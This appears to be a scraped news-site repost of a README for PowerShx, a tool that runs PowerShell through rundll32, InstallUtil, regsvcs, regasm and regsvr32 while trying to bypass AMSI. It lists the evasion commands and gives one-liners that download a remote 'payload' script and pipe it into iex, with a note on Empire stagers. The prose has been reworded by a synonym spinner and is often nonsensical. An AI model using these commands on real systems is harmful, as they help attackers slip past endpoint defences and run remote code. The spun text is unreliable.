Breaking News



Unmanaged PowerShell execution the use of DLLs or a standalone executable.

Creation

PowerShx is a rewrite and enlargement at the PowerShdll drawback. PowerShx supply functionalities for bypassing AMSI and dealing PS Cmdlets.

Possible choices

Utilization

.dll taste

rundll32

rundll32 PowerShx.dll,primary -e                           <PS script to run>
rundll32 PowerShx.dll,primary -f <trail> Run the script handed as argument
rundll32 PowerShx.dll,primary -f <trail> -c <PS Cmdlet> Load a script and run a PS cmdlet
rundll32 PowerShx.dll,primary -w Get started an interactive console in a brand new window
rundll32 PowerShx.dll,primary -i Get started an interactive console
rundll32 PowerShx.dll,primary -s Try to bypass AMSI
rundll32 PowerShx.dll,primary -v Print Execution Output to the console

Possible choices (Credit score rating score to SubTee for those tactics):

1. 
x86 - C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:WindowsMicrosoft.NETFramework64v4.0.3031964InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe PowerShx.dll
x64 C:WindowsMicrosoft.NETFramework64v4.0.30319regsvcs.exe PowerShx.dll
3.
x86 C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U PowerShx.dll
x64 C:WindowsMicrosoft.NETFramework64v4.0.30319regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

.exe taste

PowerShx.exe -i                          Get started an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <trail> Run the script handed as argument
PowerShx.exe -f <trail> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Try to bypass AMSI.

Embedded payloads

Payloads may also be embedded by way of updating the knowledge dictionary “Now not atypical.Payloads.PayloadDict” right through the “Now not atypical” drawback and calling it right through the way in which PsSession.cs -> Maintain() .
Instance: in Maintain() approach:

private void Maintain(Possible choices imaginable possible choices)
{
// Pre-execution faster than consumer script
_ps.Exe(Payloads.PayloadDict["amsi"]);
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,primary [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Notice: Empire stagers need to be decoded the use of [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,primary . { iwr -useb https://web site.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object internet.webclient).downloadstring('http://192.168.100/payload-http'))"

Should haves

.NET 4

Identified Problems

Some mistakes don’t appear to turn right through the output. Is also subtle as instructions akin to Import-Module don’t output an error on failure.
Be sure you have typed your instructions correctly.

In dll mode, interractive mode and command output depend on hijacking the father or mother procedure’ console. If the father or mother procedure does now not have a console, use the -n transfer not to display output in a different way the applying will crash.

Because of probably the most most straightforward techniques Rundll32 handles arguments, the use of slightly a large number of area characters between switches and arguments would most likely reasons why problems. More than one areas right through the scripts are ok.




Leave a Reply

Your email address will not be published. Required fields are marked *

Donate Us

X